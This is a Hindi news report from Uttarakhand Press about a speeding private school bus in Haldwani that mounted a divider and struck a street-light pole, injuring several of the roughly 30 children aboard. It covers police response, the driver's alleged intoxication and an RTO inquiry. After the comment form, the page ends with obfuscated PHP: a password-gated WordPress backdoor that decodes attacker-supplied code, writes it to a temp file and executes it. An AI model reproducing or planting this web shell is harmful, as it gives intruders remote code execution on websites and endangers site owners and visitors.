हल्द्वानी: नैनीताल रोड में डिवाइडर पर चढ़ी बस , स्ट्रीट लाइट के पोल से टकराकर रुकी, बाल-बाल बची 30 बच्चों की जान

Uttarakhand Press 19 September 2023: हल्द्वानी। स्कूली बच्चों को ले जा रही बस नैनीताल रोड पर तिकोनिया के पास डिवाइडर पर चढ़ गई और स्ट्रीट लाइट के पोल से टकराकर रुकी। एक बच्चा बस से छिटककर सड़क पर आ गिरा। बच्चों में चीख-पुकार मच गई। बस में 30 बच्चे सवार थे जिनमें कई चोटिल हो गए। गनीमत रही कि बस पलटी नहीं जिससे बड़ा हादसा होने से बचा। पुलिस ने बस को क्रेन से हटाकर कोतवाली पहुंचाया। बच्चों को दूसरी बस से उनसे घर भिजवाया।

निर्मला स्कूल में पढ़ने वाले बच्चों के माता-पिता ने मिलकर एक प्राइवेट बस किराए पर ली है। ये बस बच्चों को स्कूल लाती और ले जाती है। सोमवार को छुट्टी के बाद बस बच्चों को ले जा रही थी। दोपहर करीब 12:15 बजे तिकोनिया के पास बस बेकाबू हो गई। चालक सही से मोड़ नहीं पाया और बस डिवाइडर पर चढ़ गई। रफ्तार भी तेज थी, ऐसे में डिवाइडर पर करीब 30 मीटर तक दौड़नेे के बाद स्ट्रीट लाइट के पोल से टकराकर रुकी। पोल भी धराशायी हो गया।

जोरदार झटके से बच्चे भी अपनी सीट से उछलकर इधर-उधर गिरे और उनमें चीख-पुकार मच गई। एक बच्चा छिटककर बस से बाहर सड़क पर गिरा। गनीमत रही कि उस बीच कोई दूसरा वाहन पास से नहीं गुजरा, या उसी बस की चपेट में नहीं आया, नहीं तो बड़ी अनहोनी हो जाती।

इधर, उसी समय बनभूलपुरा थानाध्यक्ष नीरज भाकुनी मौके से गुजर रहे थे। उन्होंने लोगों की मदद से बच्चों को बस से निकालकर पंत पार्क में बैठाया। साथ ही भागने का प्रयास कर रहे चालक को लोगों ने पकड़कर पुलिस के हवाले कर दिया। पुलिस ने क्रेन की मदद से आधे घंटे बाद बस को डिवाइडर से हटाया। तब तक वहां जाम की स्थिति बनी रही। कुछ देर बाद दूसरी बस मंगाई गई और बच्चों को उनके घरों तक पहुंचाया।

स्ट्रीट लाइट का पोल न होता तो पलट जाती बस:
हल्द्वानी। प्रत्यक्षदर्शियों ने बताया कि बस की रफ्तार करीब 80 किलोमीटर प्रतिघंटा थी। इस वजह से तीन फुट ऊंचे डिवाइडर पर बस का अगला हिस्सा और पिछला पहिया चढ़ गया। लोगों का यह भी कहना है कि अगर स्ट्रीट लाइट के पोल से बस नहीं टकराती तो पलट भी सकती थी। तब बढ़ा हादसा हो जाता।

एक घंटा लगा रहा जाम, पुलिस ने डायवर्ट किया रूट:
हल्द्वानी। हादसे के बाद मौके पर जाम लग गया। सूचना पर सीओ सिटी भूपेंद्र सिंह धौनी और ट्रैफिक इंस्पेक्टर राकेश महरा भी मौके पर पहुंच गए। पुलिस ने रूट डायवर्ट किया। रूट डायवर्ट करने के बाद करीब एक घंटे बाद क्रेन से बस हटाने के बाद यातायात सुचारू हो पाया।

स्ट्रीट लाइट के पोल की चपेट में आने से बचा बाइक सवार:
हल्द्वानी। बस के आगे एक बाइक सवार चल रहा था। जब बस डिवाइडर पर चढ़ी तो वह स्ट्रीट लाइट के पोल से टकरा गई। पोल टूटकर सड़क पर गिरा जिससे बाइक सवार बाल-बाल बचा।

आरोप : नशे में था चालक, पुलिस बोली – जांच में पुष्टि नहीं हुई
हल्द्वानी। स्कूली बच्चों ने आरोप लगाया कि बस चालक बहुत तेज बस चला रहा था। वह नशे में था। उधर पुलिस ने बस चालक का मेडिकल कराया। सीओ सिटी भूपेंद्र सिंह धौनी ने कहा कि मेडिकल जांच में शराब पीने की पुष्टि नहीं हुई है।

दो बार टकराने से बची बस:
हल्द्वानी। स्कूली बच्चों ने आरोप लगाया कि चालक बहुत तेज बस चला रहा था। काठगोदाम के पास बस मोड़ने के दौरान बस नहर में जाने से बची। इसके बाद एक टेंपो से टकराने से भी बस बाल-बाल बच गई। उस समय चालक ने तेज ब्रेक लगाए। इससे बच्चों को झटका भी लगा।

बस मालिक और चालक को आरटीओ ने किया तलब
हल्द्वानी। बस मालिक और चालक को आरटीओ ने कार्यालय में बुलाया है। आरटीओ प्रशासन संदीप सैनी ने बताया कि घटना के बाद बस के बारे में पड़ताल की गई। जांच में पता चला कि बस के सभी कागज वैध हैं। फिटनेस भी है। सभी तरह के टैक्स भी जमा हैं और बस का बीमा भी है। पुलिस से जानकारी मिली है कि मेडिकल टेस्ट में चालक नशे में नहीं पाया गया है। फिर भी मंगलवार को बस चालक और स्वामी को आरटीओ बुलाया गया है। आरटीओ प्रवर्तन नंद किशोर ने बताया कि यह बस स्कूल की नहीं थी, तुरंत स्कूल में संपर्क किया गया था। ये बस अभिभावकों ने आपस में मिलकर की थी। बताया कि सितंबर के बाद अभियान चलाकर बसों की जांच की जाएगी। इधर संबंधित स्कूल प्रबंधन की ओर से भी कहा गया है कि वह बस स्कूल की नहीं थी।

Read Previous

Dengue In Uttarakhand: उत्तराखंड में डेंगू का बरपा कहर, अब तक कुल 1663 मामलें, डेंगू के रोकथाम के लिए उठाए जा रहे ये कदम

Read Next

Vanantara Resort Case: एक साल बाद भी अंकिता भंडारी को न्याय न मिलने पर निकाला गया कैंडल मार्च

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}